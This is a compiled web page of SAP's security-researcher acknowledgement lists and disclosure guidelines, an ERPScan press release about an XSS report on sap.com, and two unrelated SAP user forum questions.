The SAP Product Security Response Team thanks all researchers and security IT professionals that helped with discovering and solving security vulnerabilities. Their findings have helped SAP to maintain the security and safety of its customers' and partners' SAP systems.

Our acknowledgements page lists those professionals we have worked with successfully in the past. We thank all security researchers for their excellent work and hope to continue the fruitful relationship between security professionals and SAP.

For the current month's acknowledgments, visit theacknowledgments homepage.

April 2015

Onapsis,Nahuel D. Sánchez

Onapsis,Fernando Russ

Martijn Sprengers

March 2015

ERPScan,Dmitry Chastuhin, Vahagn Vardanyan

ESNC, Ertunga Arsal

Onapsis,Sergio Abraham

February 2015

ERPScan, Dmitry Chastuhin, Dmitry Evdokimov, George Nosenko, Vahagn Vardanyan

ING Services Polska,Lukasz Miedzinski

Onapsis, Nahuel D. Sánchez, Fernando Russ

Roberto Garcia Amoriz

Virtual Forge, Andreas Wiegenstein

January 2015

ERPScan, Nikolay Mescherin

ESNC, Ertunga Arsal

Gopal Bisht

Gerasimos Panou

Onapsis, Sergio Abraham, Nahuel D. Sánchez, Fernando Russ

Rabiya Batool

Sense of Security, Fatih Ozavci

Trustwave SpiderLabs, Martin Rakhmanov

Virtual Forge, Andreas Wiegenstein

December 2014

Diego Bardalez Plaza

ERPScan, George Nosenko, Vahagn Vardanyan

ESNC, Ertunga Arsal

Genral Motors, Markus Seibel

Mohamed Abdelbaset Elnoby

Sense of Security, Fatih Ozavci

Virtual Forge, Andreas Wiegenstein, Xu Jia

ZDI, John Leitch

November 2014

Emaze Networks S.p.A., Enrico Milanese

ERPScan, Vahagn Vardanyan

ERPSecurity,Joris van de Vis

ESNC, Ertunga Arsal, Mert Suoglu

Kamil Sevi, Kamil Sevi

Portcullis Advisories, Tim Brown

Siemens AG

Subgraph, David Mckinney

Virtual Forge, Andreas Wiegenstein, Xu Jia

October 2014

AKS IT Services, V. Lakshmi Kiran

Core Security, Martin Gallo

ERPScan, Alexey Tyurin,Dmitry Chastuhin, Igor Ilyin, Roman Bazhin, Vahagn Vardanyan

ERPSecurity, Joris van de Vis

Onapsis, Will Vandevanter

Subgraph, David Mckinney

Virtual Forge, Andreas Wiegenstein, Frederik Weidemann, Peter Werner, Xu Jia

September 2014

ERPSecurity,Joris van de Vis, SAP Security Note 2030775

ERPSecurity,Joris van de Vis, SAP Security Note 2043506

ERPSecurity,Joris van de Vis, SAP Security Note1908631

ESNC, Ertunga Arsal, SAP Security Note 2015232

ESNC, Ertunga Arsal, SAP Security Note 1971397

Onapsis, Juan Pablo Perez Etchegoyen, Will Vandevanter, SAP Security Note 2039905

Onapsis, Pablo Muller, SAP Security Note 1979454

Sense of Security, Fatih Ozavci, SAP Security Note 2042074

Sense of Security, Fatih Ozavci, SAP Security Note 2039924

Sense of Security, Fatih Ozavci, SAP Security Note 2036547

August 2014
BDO, Buslov Dmitry, SAP Security Note 2028484

ERPSecurity,Joris van de Vis, SAP Security Note 1739143

ERPSecurity,Joris van de Vis, SAP Security Note 2017651

ERPScan, George Nosenko, SAP Security Note 2018221

ERPScan, George Nosenko, SAP Security Note 2025931

ESNC, Ertunga Arsal, SAP Security Note 1870485

NTT Com Security, Stephen Breen, SAP Security Note 2044175

NTT Com Security, Justin Kennedy, SAP Security Note 2053074

Trustwave, Martin Rakhmanov, SAP Security note 2044220

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1987773

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1769064

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1992114

ZDI, Aniway Anyway, SAP Security Note 1999142

July 2014

ERNW, Florian Grunow, SAP Security Note 1988956

ERPScan, Dmitry Chastuhin, SAP Security Note 2011169

Red-Team, Dave Hewson, SAP Security Note 1962104

ZDI Disclosures, Shanoon, SAP Security Note 2028891

NTT Com Security, Stephen Breen, SAP Security Note 2036562

June 2014

Compass Security, Stefan Horlacher, SAP Security Note 1908531

ERPScan, Dmitry Chastuhin, Vahagn Varda SAP Security Note 2014881

Onapsis, Will Vandevanter, SAP Security Note 2015446

Onapsis, Will Vandevanter, SAP Security Note 2001109

Onapsis, Will Vandevanter, SAP Security Note 2001106

Onapsis, Will Vandevanter, SAP Security Note 1998990

Onapsis, Will Vandevanter, SAP Security Note 1941562

Onapsis, Nahuel D. Sánchez, SAP Security Note 1967780

Subgraph, David Mckinney, SAP Security Note 1981048

Subgraph, David Mckinney, SAP Security Note 1971270

May 2014

Atos IT Gmbh,Josè Manuel Lorenzo Lopez, SAP Security Note 1979438

ESNC, Ertunga Arsal, SAP Security Note1889999

Onapsis, Will Vandevanter, SAP Security Note2009696

Positive Technologies, Dmitry Gutsko, SAP Security Note 1997455

April 2014

Core Security, Martin Gallo,SAP Security Note 1986895

ERPSecurity, Joris van de Vis, SAP Security Note 1940405

ERPSecurity, Joris van de Vis, SAP Security Note 1971516

ESNC, Ertunga Arsal, SAP Security Note 1940405

Onapsis, Nahuel D. Sánchez, SAP Security Note 1974016

Onapsis, Will Vandevanter, SAP Security Note1993349

Onapsis, Sergio Abraham, SAP Security Note 1929473

Onapsis, Nahuel D. Sánchez, SAP Security Note 1778940

Subgraph, David McKinney, SAP Security Note1975842

University Bremen, Christian Liebig, SAP Security Note 1975842

University Bremen, Christian Liebig, SAP Security Note 2001778

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1987413

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1985100

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1983739

Virtual Forge, Frederik Weidemann, SAP Security Note 1878371

March 2014
Emaze Networks S.p.A., Enrico Milanese, SAP Security Note 1946420

ERPSecurity, Joris van de Vis, SAP Security Note 1965610

ERPSecurity, Joris van de Vis, SAP Security Note 1884678

ESNC, Ertunga Arsal, SAP Security Note 1971238

Onapsis, Sergio Abraham, SAP Security Note 1964428

Onapsis, Sergio Abraham, Manuel Muradas, SAP Security Note 1963932

February 2014

ERPScan,Alexander Polyakov, SAP Security Note1860923

ESNC,Ertunga Arsal, SAP Security Note1945300

Onapsis, Sergio Abraham,SAP Security Note1791081

Onapsis, Sergio Abraham,SAP Security Note1768049

Onapsis, Sergio Abraham,SAP Security Note1920323

Onapsis, Sergio Abraham,SAP Security Note1915873

Onapsis, Sergio Abraham,SAP Security Note1914777

Onapsis, Sergio Abraham,SAP Security Note1911174

Onapsis, Sergio Abraham,SAP Security Note1795463

Onapsis, Sergio Abraham,SAP Security Note1789569

Onapsis, Sergio Abraham,SAP Security Note1738965

Onapsis, Juan Pablo Perez Etchegoyen, Jordan Santarsieri, Pablo Muller,SAP Security Note1939334

CyberSecurity Maldives,Shabnoon Khalid, SAP Security Note1905408

January 2014

ERPScan,Neyolov Evgeny, SAP Security Note1828885

ERPScan, Dmitry Chastuhin, SAP Security Note1788080

Emaze Networks S.p.A., Enrico Milanese, SAP Security Note1932505

ERNW,Florian Grunow, SAP Security Note 1924853

ESNC, Ertunga Arsal, SAP Security Note 1886051

ESNC, Ertunga Arsal, SAP Security Note 1865109

Onapsis, Nahuel D. Sánchez, SAP Security Note 1894049

Onapsis,Juan Pablo Perez Etchegoyen, SAP Security Note,1865109
Onapsis,Nahuel D. Sánchez, SAP Security Note 1918333

Onapsis, Nahuel D. Sánchez, SAP Security Note1917381

Onapsis, Jordan Santarsieri, SAP Security Note 1922547

Onapsis,Jordan Santarsieri, SAP Security Note 1910914

Onapsis, Will Vandevanter, SAP Security Note 1931399

SecuRing, Krzysztof Kotowicz, SAP Security Note 1916560

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1949046

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1898046

Virtual Forge,Xu Jia, SAP Security Note 1884596

Virtual Forge, Andreas Wiegenstein, SAP Security Note1956096

December 2013

AppSecInc, Martin Rakhmanov, SAP Security Note 1927859

Compass Security, Stefan Horlacher, SAP Security Note 1908562

Compass Security, Stefan Horlacher, SAP Security Note 1908647

ERPScan, Alexander Polyakov, SAP Security Note 1852146

ERPScan, Georgy Nosenko, SAP Security Note 1773912

ERPScan, Alexey Tyurin, Nikolay Mescherin, SAP Security Note1917054

ERPSecurity, Joris van de Vis, SAP Security Note 1896642

ERPSecurity, Joris van de Vis, SAP Security Note 1900200

ERPSecurity, Joris van de Vis, SAP Security Note 1929338

ESNC, Ertunga Arsal, SAP Security Note 1782753

ESNC, Ertunga Arsal, SAP Security Note 1862392

ESNC, Ertunga Arsal, SAP Security Note 1909770

ESNC, Ertunga Arsal, SAP Security Note 1909858

Onapsis, Sergio Abraham, SAP Security Note 1911523

Onapsis, Sergio Abraham, SAP Security Note 1913554

Onapsis, Sergio Abraham, SAP Security Note 1926485

Sense of Security, Jason Edelstein, SAP Security Note 1802724

Simple solutions, Daniil Luzin, SAP Security Note 1925908

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1866296

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1896988

Virtual Forge, Frederik Weidemann, SAP Security Note 1819139

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1951875

November 2013

ERPScan, Nikolay Mescherin, SAP Security Note 1836718

ERPScan, Georgy Nosenko, SAP Security Note 1853140

ERPScan, Dmitriy Evdokimov, SAP Security Note 1864518

ERPScan, Alexey Tyurin, Nikolay Mescherin, SAP Security Note 1909665

ERPSecurity, Joris van de Vis, SAP Security Note 1903756

ERPSecurity, Joris van de Vis, SAP Security Note 1899146

ERPSecurity, Fred van de Langenberg, SAP Security Note 1898735

ESNC, Ertunga Arsal, SAP Security Note 1836314

ESNC, Ertunga Arsal, SAP Security Note 1917888

ESNC, Ertunga Arsal, SAP Security Note 1910737

ESNC, Ertunga Arsal, SAP Security Note 1907712

ESNC, Ertunga Arsal, SAP Security Note 1902986

ESNC, Ertunga Arsal, SAP Security Note 1902402

ESNC, Ertunga Arsal, Mert Suoglu, SAP Security Note 1905591

ESNC, Ertunga Arsal, SAP Security Note 1906568

ESNC, Ertunga Arsal, SAP Security Note 1843169

ESNC, Ertunga Arsal, SAP Security Note 1902611

Hacktics Advanced Security Center, Ernst & Young, Oren Hafif, Egor Pryadko,SAP Security Note 1861907

KPMG, Agus Komang, SAP Security Note 1846945

Positive Technologies, Dmitry Sklyarov, Dmitry Gutsko SAP Security Note 1902611

Simple solutions, Daniil Luzin, SAP Security Note 1861907

October 2013

ERPScan, Alexander Polyakov, SAP Security Note 1854826

ESNC, Ertunga Arsal, SAP Security Note 1868140

ESNC, Ertunga Arsal, SAP Security Note 1876343

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1853616

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1885371

Onapsis, Nahuel D. Sánchez, SAP Security Note1914778

Sense of Security, Chris Archimandritis, SAP Security Note 1911067

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1898055

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1902854

September 2013

AppSecInc, Martin Rakhmanov, SAP Security Note 1809246

AppSecInc, Martin Rakhmanov, SAP Security Note 1849356

AppSecInc, Martin Rakhmanov, SAP Security Note 1893558

AppSecInc, Martin Rakhmanov, SAP Security Note 1893561

AppSecInc, Martin Rakhmanov, SAP Security Note 1893556

AppSecInc, Martin Rakhmanov, SAP Security Note 1893440

AppSecInc, Vladimir Zakharevich, SAP Security Note 1893560

ERPScan, Alexander Polyakov, SAP Security Note 1783795

ERPScan, Dmitriy Evdokimov, SAP Security Note 1828801

ERPScan,Dmitriy Evdokimov, SAP Security Note 1879601

ERPScan, Nikolay Mescherin, SAP Security Note 1890819

ERPSecurity,Joris van de Vis, SAP Security Note 1888167

ERPSecurity,Joris van de Vis, SAP Security Note 1888502

ERPSecurity,Joris van de Vis, SAP Security Note 1672911

ERPSecurity,Joris van de Vis, SAP Security Note 1889895

ESNC, Ertunga Arsal, SAP Security Note 1842826

ESNC, Ertunga Arsal, SAP Security Note 1847590

ESNC, Ertunga Arsal, SAP Security Note 1860258

ESNC, Ertunga Arsal, SAP Security Note 1863278

ESNC, Ertunga Arsal, SAP Security Note 1881914

ESNC, Ertunga Arsal, SAP Security Note 1884512

Positive Technologies, Igor Bulatenko, SAP Security Note 1887341

Simple solutions, Daniil Luzin, SAP Security Note 1864915

Virtual Forge, Andreas Wiegenstein & Sven Neuz, SAP Security Note 1777053

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1871683

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1885611

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1896785

August 2013

akquinet AG, Ralf Kempf, SAP Security Note 1764298

Raiffeisen Informatik GmbH, Chris John Riley, SAP Security Note 1851123

ERPScan, Nikolay Mescherin, SAP Security Note 1840249

ERPSecurity, Joris van de Vis, SAP Security Note 1861791

Emaze Networks S.p.A., Enrico Milanese, SAP Security Note 1851123

ESNC, Ertunga Arsal, SAP Security Note1772529

ESNC, Ertunga Arsal, SAP Security Note 1842817

ESNC, Ertunga Arsal, SAP Security Note 1845802

ESNC, Ertunga Arsal, SAP Security Note 1847217

ESNC, Ertunga Arsal, SAP Security Note 1852955

ESNC, Ertunga Arsal, SAP Security Note 1856296

ESNC, Ertunga Arsal, SAP Security Note 1860308

ESNC, Ertunga Arsal, SAP Security Note 1873131

Hacktics Advanced Security Center, Ernst & Young, Alex Mor, SAP Security Note 1835125

Hacktics Advanced Security Center, Ernst & Young, Alex Mor, SAP Security Note 1838451

IOACTIVE Security Research Adv, Ariel M. Sanchez, SAP Security Note 1880040

Onapsis, Jordan Santarsieri, SAP Security Note 1773651

Virtual Forge, Andreas Wiegenstein & Sandra Möckel, SAP Security Note 1688229

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1847811

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1772529

Virtual Forge, Andreas Wiegenstein, Gert Kremser, Sven Neuz & Xu Jia, SAP Security Note 1861791

July 2013

Comsec Global Consulting,Moshe Zioni, SAP Security Note 1823687

ERPScan, Dmitry Chastuhin, SAP Security Note 1831022

ERPScan, Dmitry Chastuhin, SAP Security Note 1831053

ESNC, Ertunga Arsal, SAP Security Note1839699

ESNC, Ertunga Arsal, SAP Security Note1851835

ESNC, Ertunga Arsal, SAP Security Note1846653

ESNC, Ertunga Arsal, SAP Security Note1853040

ESNC, Ertunga Arsal, SAP Security Note1858474

ESNC, Ertunga Arsal, SAP Security Note1858566

ESNC, Ertunga Arsal, SAP Security Note1854252

ESNC, Ertunga Arsal, SAP Security Note1860367

ESNC, Ertunga Arsal, SAP Security Note1860278

ESNC, Ertunga Arsal, SAP Security Note1856093

ESNC, Ertunga Arsal, SAP Security Note1863091

ESNC, Ertunga Arsal, SAP Security Note1846515

ESNC, Ertunga Arsal, SAP Security Note1840304

ESNC, Ertunga Arsal, SAP Security Note1852738

ESNC, Ertunga Arsal, SAP Security Note1868012

ESNC, Ertunga Arsal, SAP Security Note1864397

Simple Solutions,Daniil Luzin, SAP Security Note 1861295

June 2013

ERPSecurity,Joris van de Vis, SAP Security Note 1836717
ERPSecurity,Joris van de Vis, SAP Security Note 1805024

ERPSecurity,Joris van de Vis, SAP Security Note 1831463

ERPSecurity,Joris van de Vis, SAP Security Note 1774432

ESNC, Ertunga Arsal, SAP Security Note1781594

ESNC, Ertunga Arsal, SAP Security Note1834935

ESNC, Ertunga Arsal, SAP Security Note1816331

ESNC, Ertunga Arsal, SAP Security Note1842218

ESNC, Ertunga Arsal, SAP Security Note1848319

ESNC, Ertunga Arsal, SAP Security Note1849744

ESNC, Ertunga Arsal, SAP Security Note1849559

ESNC, Ertunga Arsal, SAP Security Note1848996

ESNC, Ertunga Arsal, SAP Security Note1853852

ESNC, Ertunga Arsal, SAP Security Note1826162

ESNC, Ertunga Arsal, SAP Security Note1847645

KPMG,Agus Komang, SAP Security Note 1846952

Positive Technologies,Dmitry Gutsko,SAP Security Note 1844202

SEC Consult,Gerhard Wagner and Bernhard Mueller, SAP Security Note 1851914

SEC Consult,Gerhard Wagner and Bernhard Mueller, SAP Security Note 1852064

SEC Consult,Gerhard Wagner and Bernhard Mueller, SAP Security Note 1858107

Trustwerk GmbH, Ralf Nellessen, SAP Security Note 1853161

Virtual Forge,Xu Jia, SAP Security Note 1843082

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1842406

May 2013

CBACert, Commonwealth Bank of Australia,Jonathan Brossard, SAP Security Note 1791238

CBACert, Commonwealth Bank of Australia,Jonathan Brossard, SAP Security Note 1791490

ERPScan, Georgy Nosenko, SAP Security Note 1820666

ERPSecurity,Joris van de Vis, SAP Security Note 1729638

ERPSecurity,Joris van de Vis, SAP Security Note 1810809

ESNC, Ertunga Arsal, SAP Security Note1787455

ESNC, Ertunga Arsal, SAP Security Note1837030

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note1839758

Matthew Phillips, SAP Security Note1840970

Onapsis, Jordan Santarsieri, SAP SecurityNote 1829584

Positive Technologies,Pavel Toporkov, SAP Security Note 1779578

Virtual Forge,Stefan Vogel, Frederik Weidemann, SAP Security Note1718145

April 2013

Virtual Forge,Sandra Möckel and Andreas Wiegenstein, SAP Security Note 1718022

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1827217

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1757472

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1819822

KPMG, Tan Kean Siong, SAP Security Note 1784771

ESNC, Ertunga Arsal, SAP Security Note1812581

INTEGRITY S.A., Bruno Morisson, SAP Security Note1816536

ERPScan, Nikolay Mescherin, SAP Security Note 1821862

ERPScan, Nikolay Mescherin and Alexey Tyurin, SAP Security Note 1821019

March 2013

ESNC, Ertunga Arsal, SAP Security Note1771567

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note1813734

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1789823

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1786822

Virtual Forge,Andreas Wiegenstein and Xu Jia, SAP Security Note 1806435

ERPScan, Alexander Polyakov, SAP Security Note 1784894

ERPScan, Alexander Polyakov, SAP Security Note 1789611

ERPScan, Nikolay Mescherin, SAP Security Note 1807196

ERPScan, Alexander Polyakov, SAP Security Note 1685106

Onapsis, Nahuel D. Sánchez, SAP SecurityNote 1789611

Positive Technologies,Arseny Reutov, SAP Security Note 1820894

February 2013

Core Security Consulting Services,Martin Gallo and Francisco Falcon, SAP Security Note 1800603

ERPScan, Dmitry Chastuhin, SAP Security Note 1757675

ERPScan, Nikolay Mescherin, SAP Security Note 1446476

ERPSecurity,Joris van de Vis, SAP Security Note 1796264

ESNC, Ertunga Arsal, SAP Security Note1750997

ESNC, Ertunga Arsal, SAP Security Note1777228

ESNC, Ertunga Arsal, SAP Security Note 1788426

ESNC, Ertunga Arsal, SAP Security Note1791089

ESNC, Ertunga Arsal, SAP Security Note1792354

ESNC, Ertunga Arsal, SAP Security Note1795948

MWR Labs, andContext IS,Dave Hartley, SAP Security Note1764994

Onapsis, Nahuel D. Sánchez, SAP SecurityNote 1757675

Virtual Forge,Frederik Weidemann, SAP Security Note 1750997

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1788614

Virtual Forge,Xu Jia, Andreas  Wiegenstein, Frederik Weidemann and Markus Schumacher, SAP Security Note1819543

January 2013

Compass Security AG,Axel Neumann, SAP Security Note 1784770

ERPScan, Alexey Tuyrin and Dmitry Chastuhin, SAP Security Note 1412864

ERPScan, Dmitry Chastuhin, SAP Security Note 1628537

ERPScan, Dmitry Chastuhin, SAP Security Note 1729293

ERPScan, Dmitry Chastuhin, SAP Security Note 1725390

ERPSecurity, Joris van de Vis, SAP Security Note 1674132
ERPSecurity,Joris van de Vis, SAP Security Note 1794299

ESNC, Ertunga Arsal, SAP Security Note1674132

ESNC, Ertunga Arsal, SAP Security Note1779317

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note1673016

ESNC, Ertunga Arsal, SAP Security Note1776984

Finnish Communications Regulatory Authority (FICORA), Jussi, SAP Security Note1731362

Onapsis, Juan Pablo Perez Etchegoyen, SAP SecurityNote 1755108

Virtual Forge,Xu Jia and Andreas Wiegenstein, SAP Security Note 1772208

Virtual Forge,Xu Jia and Andreas Wiegenstein, SAP Security Note 1785747

Virtual Forge,Xu Jia and Andreas Wiegenstein, SAP Security Note 1775422

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1784654

December 2012

ERPSecurity,Joris van de Vis, SAP Security Note 1771020
ERPSecurity,Joris van de Vis, SAP Security Note 1769099

ERPSecurity,Joris van de Vis, SAP Security Note 1773758

ERPSecurity,Joris van de Vis, SAP Security Note 1714607

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note1776695

ESNC, Ertunga Arsal, SAP Security Note1772498

ESNC, Ertunga Arsal, SAP Security Note1774903

ESNC, Ertunga Arsal and Anja Meiser, SAP Security Note1771204

Virtual Forge,Xu Jia and Andreas Wiegenstein, SAP Security Note 1774903

November 2012

CIBER, Martin Voros, SAP Security Note, SAP Security Note 1597598

ERPScan, Alexey Tuyrin, SAP Security Note1715040

ERPScan, Alexey Tuyrin, SAP Security Note 1734986

ERPScan, Dmitry Chastuhin, SAP Security Note1679897

ERPSecurity,Joris van de Vis, SAP Security Note 1673713
ERPSecurity,Joris van de Vis, SAP Security Note 1652271

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note, 1774568

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note, 1758450

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note, 1682613

Virtual Forge,Frederik Weidemann, SAP Security Note1652271

Virtual Forge,Xu Jia, SAP Security Note 1686172

Virtual Forge,Xu Jia and Andreas Wiegenstein, SAP Security Note 1768068

October 2012

ERPScan, Alexandr Polyakov, SAP Security Note1724516

September 2012

Virtual Forge,Gert Kremser, SAP Security Note 1678732

ERPScan, Alexey Tuyrin, SAP Security Note1621534

ERPSecurity,Joris van de Vis, SAP Security Note 1668224
ESNC,Ertunga Arsal, SAP Security Note 1668224

August 2012

Virtual Forge,Sebastian Schinzel, SAP Security Note 1687334

Virtual Forge,Sebastian Schinzel, SAP Security Note 1684632
Virtual Forge,Gert Kremser, SAP Security Note 1692988

Ruhr-Universität Bochum,Juraj Somorovsky,Tibor Jager, SAP Security Note 1687334
Ruhr-Universität Bochum,Juraj Somorovsky,Tibor Jager, SAP Security Note 1684632

ERPSecurity,Joris van de Vis, SAP Security Note 1727914
ERPSecurity,Joris van de Vis, SAP Security Note 1718613

ERPScan, Alexey Tuyrin, SAP Security Note 1728500
ERPScan, Alexander Polyakov, SAP Security Note 1669031

Positive Technologies, Ilya Smith, Maxim Tsoy, Kirill Mosolov, Evgeny Ryzhov, SAP Security Note 1663732

July 2012

ERPScan, Dmitry Chastuhin, SAP Security Note 1721309

ERPScan, Alexander Polyakov, Alexey Tuyrin, Alexandr Minojenko, SAP Security Note 1723641

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1686842

Virtual Forge,Andreas Wiegenstein & Frederik Weidemann, SAP Security Note 1720994

sec-1, Richard Jones, SAP Security Note 1723641

June 2012

ESNC,Ertunga Arsal, SAP Security Note 1691744

ESNC,Ertunga Arsal and Mert Suoglu, SAP Security Note 1537089

Virtual Forge,Andreas Wiegenstein, SAP Security Note 1695286
Virtual Forge,Andreas Wiegenstein, SAP Security Note 1683644
Virtual Forge,Andreas Wiegenstein, SAP Security Note 1684539

Virtual Forge,Frederik Weidemann & Markus Seibel (GM IT Business Service), SAP Security Note 1638779

ERPScan, Alexander Polyakov, Alexey Tuyrin, Alexandr Minojenko, SAP Security Note 1707494
ERPScan, Dmitry Chastuhin, SAP Security Note 1705800

CIBER, Martin Voros, SAP Security Note 1599567

akquinet AG,Ralf Kempf, SAP Security Note 1537089

May 2012

Compass Security AG,Alexandre Herzog, 1626152

Positive Technologies,Vladimir Zarichny, 1687910

Affinion International,Sherif Mansour, SAP SecurityNote 1615019

ERPScan, Dmitry Chastuhin, SAP Security Note 1590866

ERPScan,, Alexey Tuyrin, SAP Security Note 1597066

ERPScan,, Alexey Tuyrin, SAP Security Note 1614834

ERPScan,, Dmitry Chastuhin, SAP Security Note 1675605

Zero Day Initiative,SAP Security Note 1685003

Zero Day Initiative,SAP Security Note 1662272

ERPSecurity,Joris van de Vis, SAP Security Note 1675533

ERPSecurity,Joris van de Vis, SAP Security Note 1682505

Core Security Consulting Services,Martin Gallo, 1687910

Context Information Security Ltd,Michael Jordon, Security Note 1341333

The SAP Product Security Response Team thanks all researchers and security IT professionals that help with discovering and solving security vulnerabilities. Their findings continuously help SAP maintain the security and safety of its customers' and partners' SAP systems.

Our acknowledgements page lists those professionals we have worked with successfully in the past. We thank all security researchers for their excellent work and hope to continue the beneficial relationship between security professionals and SAP.

Security researchers who have helped SAP to improve the security and integrity of our customers' IT systems by respecting our disclosure guidelines this month are:

May 2015

Alexander Klink

Abdul Wasay

Core Security, Martin Gallo

Pegasus

Onapsis,Juan Perez-Etchegoyen, Nahuel D. Sánchez, Pablo Artuso, Will Vandevanter

Trustwave, Martin Rakhmanov

Virtual Forge, Andreas Wiegenstein

Xiting, Julius Bussche

Each Patch Day (second Tuesday of a month) the involved external researchers are listed with company name, link to their home page, and name of the person. Details about finding are not included. The order of the list is alphabetical according to company name.

For previous months' acknowledgments, visit theacknowledgments archivepage.

To view the security notes released this Patch Day, visit theSupport Portal.

SAP encourages the responsible disclosure of security vulnerabilities and therefore requests the researchers to follow the following general guidelines:

1. If you have detected a vulnerability in one of our software products – either in the latest or in a former product version –you shall inform us about the issue and follow the guidelines and processes in accordance with our Portal page “Report a Security Vulnerability to SAP”.
2. Give SAP sufficient time to develop suitable fixes.
3. Do not publicize vulnerabilities until SAP customers have had enough time to deploy fixes.
4. As a rule of thumb, we suggest respecting an implementation time of three months. We ask all security researchers to not disseminate any kind of information or tools that would help to exploit the vulnerability during that time.
5. Provide us all of your external disclosures beforehand, such as advisories or presentations with SAP product security content for a review.

We honestly appreciate your work and certainly want to show this appreciation through credits on a public Web site. Nevertheless, SAP reserves the right to change or delete credits at any time.

For further information, read theDisclosure Guidelinesfor SAP Security Advisories.

May 7, Palo Alto, CA. ERPScan's Security Research and Threat Intelligence division has identified information leak of highly-critical 0-day vulnerability in SAP.com on a public resource.

On the 4th of May 2015 security researcher v0raz reported on xssposed.org website about 0-day  XSS (Cross-Site Scripting) vulnerability on sap.com (it has 4 vulnerabilities reported by security researchers). The vulnerability remained unpatched for at least 3 days, putting sap.com users, visitors and administrators at risk of being compromised by malicious hackers.

XSS vulnerability on SAP website put customers' data at risk of being stolen by hackers. Information data such as cookies, personal data, authentication credentials, and browser history are probably the less dangerous consequences of XSS attacks. In a worst case scenario XSS attacks can even give a full control of a website and ability to intrude corporate networks and all mission critical assets.

Customers's security is of primary concern to us. Our Security Research and Intelligence team continuously analyses all public resources for any data leakage related to mission-critical systems such as SAP or Oracle ERP systems and business applications. We alerted SAP Security Response Team immediately and they are working on it. We would also like to alert all customers and strongly recommend to them, and to the users of SAP websites to not open any seemingly malicious links from untrusted sources while they are logged into SAP Website until the time this vulnerability is patched.

- adds Taran Kambo, VP of Customer Success at ERPScan.

XSS attacks are becoming more and more sophisticated these days and are being used in collusion with spear phishing, social engineering and drive-by attacks.

One of the most important angles of SAP Security apart from vulnerabilities in SAP platforms is security of custom programs. Companies develop custom programs on top of their systems as SAP is more like a framework on which organizations build their own systems using different languages and platforms such as ABAP, JAVA and XSJS or UI5 framework. These customization's mean that every SAP system in an organization is unique. Apart from major platform vulnerabilities and configuration issues (such as Password policies, Default users, Encryption, unnecessary services, Verb Tampering vulnerabilities, RFC Connections and SAP Gateway attacks) that exist in almost every SAP Installation, companies may have issues in custom programs which have the same importance as that of SAP platform security. Usually about 50% of SAP implementations code base is actually custom programs which extend or modify SAP functionality.

Eventually once needs to be sure that all 3 layers of SAP Security such as Platform Security, Custom code security and Segregation of Duties are covered together to have a clear visibility of the wholistic picture.

- adds Alexander Polyakov, CTO ERPScan

These custom programs usually have vulnerabilities such as XSS, Missing Authorization checks, and Directory Traversal (Top 3 most rampant vulnerabilities according our "Analysis of 3000 vulnerabilities in SAP" report published by ERPScan 6 months ago). This top 3 list remains relevant to date with slight changes, and these 3 issues cover 66% of all the most frequent vulnerabilities in Source code of SAP Systems.

XSS actually is the most common of the rest, and as part of our job in helping companies to be secure, we continuously publish guidelines for securing SAP from different angles. ERPScan’s aim is to alert SAP and our clients of every event regarding SAP Security and help companies in dealing with them.

We were able to swiftly react to this incident, combining our existing knowledgebase provided in our solutions and efforts of our Research and Intelligence team. On 6th of May we published a guideline on how to improve SAP NetWeaver ABAP, JAVA and SAP HANA Security by protecting listed solutions  from XSS attacks.

- adds Alexander Polyakov, ERPScan's CTO.

The latest guideline is the ultimate 27-pages report with the most comprehensive details on how to secure SAP Systems from all types of XSS attacks for every type of development platform that can be used in SAP infrastructure.

Apart from general information about XSS vulnerabilities this report provides comprehensive information on how to:

• Prevent issues on the source code level during development;
• Minimize attack possibility by securely configuring application during implementation;
• Maximize visibility by securely configuring logs to identify cyberattacks or an attack attempt if it were to happen.

For a detailed guide please follow this link, and our blog, here we will keep you posted with our latest research, and don't forget to implement latest SAP Security Notes every month.

After installing SAP Content Server 6.5 to Windows Server 2012 on attempt to execute the query putCert to import the certificate (X.509 v3 DSA or RSA) get an error: "X-ErrorDescription:" Security: CertToTBS failed in SsfLibVerify (empty signerlist) "

Hi

We would like to restrict ME21N access by material type. I believe this is possible  by turning on the authorisation check in  SU24 for ME21N transaction for authorisation object M_MATE_MAR and once the relevant material types are maintained through T-code OMS2

Would these two changes suffice or do we need to activate any BADI in ME21N transaction to enable this authorisation check. I am not sure if M_MATE_MAR check is part of standard authorisation checks in ME21N. Please advise

Thanks & Regards

Dinesh N

